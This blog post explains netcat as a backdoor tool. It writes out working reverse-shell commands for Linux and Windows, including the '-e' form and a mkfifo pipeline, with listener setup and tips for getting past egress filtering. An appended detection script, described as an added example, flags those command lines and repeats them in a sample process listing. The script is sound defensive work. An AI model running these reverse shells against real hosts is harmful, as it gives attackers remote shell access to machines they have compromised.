Jeet Kune Crypto: netcat (reverse shells)
One of the most useful TCP/IP tools for network and systems engineers is netcat, commonly referred to as the “TCP/IP Swiss Army Knife”. Because it can just as easily be used as a backdoor, it is often flagged as malware or a “potentially unwanted program” by anti-malware software.
A traditional backdoor binds to a port and waits for you to connect to it (netcat can do that too, with -l). Here are a few ways to use it as a “reverse shell” instead: a backdoor that connects back out to a listener you control, which is what you want when inbound connections to the compromised host are filtered:
Versions that support “-e” (nc.traditional built with GAPING_SECURITY_HOLE, and ncat from the Nmap project, which also accepts --exec; the OpenBSD netcat shipped by many distributions deliberately omits it). The host and port are those of your listener, not of the compromised machine:
Linux:
nc -e /bin/sh <listener host> <listener port>
Windows:
nc -e cmd.exe <listener host> <listener port>
If the version of netcat you’re using does not support “-e”, you can get the same effect by plumbing a shell through a named pipe (a FIFO, not a network socket): cat reads the FIFO and feeds it to the shell as input, the shell’s stdout and stderr go to netcat, and whatever netcat receives from you is written back into the FIFO, closing the loop. On Linux, like so (mkfifo fails if the path already exists, hence the rm first):
rm -f /tmp/socket; mkfifo /tmp/socket; cat /tmp/socket | /bin/sh -i 2>&1 | nc <listener host> <listener port> > /tmp/socket
If you’re using netcat to listen for the incoming connection, start the listener on your own host before launching the reverse shell. With nc.traditional or ncat:
nc -l -v -p <port>
With the OpenBSD netcat, -p is not combined with -l; the port is given directly:
nc -l -v <port>
Note that without -l, nc <host> <port> connects out rather than listening, and the range form nc <host> <starting port>-<ending port> scans a range of ports on a remote host; it does not listen. A listener handles a single port, so pick one the compromised host can reach outbound (443 is a common choice where egress filtering is in place).
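As an added example that is not part of the original post, the script below is the defender’s counterpart to the commands above: a function that scans process command lines, such as the output of ps -eo args=, and flags both netcat reverse-shell forms shown on this page, the -e/--exec form and the mkfifo pipeline form, while leaving ordinary listeners and port scans alone. The sample process listing and the listener address 10.0.0.5:4444 are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original post: flag netcat reverse-shell
# command lines in a process listing (one command line per input line,
# e.g. from `ps -eo args=`). Hosts, ports and the sample listing are
# constructed for this demonstration.

# Print each input line that looks like a netcat reverse shell:
#   1. nc/ncat/netcat run with -e, --exec, --sh-exec or -c (the "-e" form), or
#   2. the FIFO pipeline form: mkfifo ... | nc <host> <port> > <fifo>.
# Plain listeners (nc -l ...) and port scans (nc host 20-80) are not flagged.
# Caveat: OpenBSD nc uses -c for TLS, so drop -c from the pattern if that is
# the only netcat on your hosts, or expect false positives.
detect_nc_reverse_shells() {
    grep -E \
        -e '(^|[[:space:]/])(nc|ncat|netcat)[[:space:]]+(.*[[:space:]])?(-e|--exec|--sh-exec|-c)([[:space:]]|=)' \
        -e 'mkfifo[[:space:]].*[|][[:space:]]*(/[^[:space:]]*/)?(nc|ncat|netcat)[[:space:]].*>[[:space:]]*/'
}

# Number of flagged lines, for dashboards or alert thresholds.
count_nc_reverse_shells() {
    detect_nc_reverse_shells | grep -c .
}

# Constructed sample `ps -eo args=` output; 10.0.0.5:4444 is the listener.
# Lines 3, 4 and 5 are reverse shells; the rest are benign lookalikes
# (a listener, a port scan, rsync's own -e option).
SAMPLE_PS='/usr/sbin/sshd -D
nc -l -v -p 4444
nc -e /bin/sh 10.0.0.5 4444
ncat --exec cmd.exe 10.0.0.5 4444
sh -c rm -f /tmp/socket;mkfifo /tmp/socket;cat /tmp/socket|/bin/sh -i 2>&1|nc 10.0.0.5 4444 > /tmp/socket
nc -z -v 10.0.0.5 20-80
rsync -e ssh src/ host:dst/
bash'

# Demo run: prints the three reverse-shell lines from the sample.
printf '%s\n' "$SAMPLE_PS" | detect_nc_reverse_shells
```

On a live host, replace the sample with ps -eo args= | detect_nc_reverse_shells. The patterns key on the command line only, so a netcat binary renamed to something innocuous, or a shell started through another transport such as bash’s /dev/tcp, will not be caught; pair this with network-side detection of unexpected outbound connections from servers.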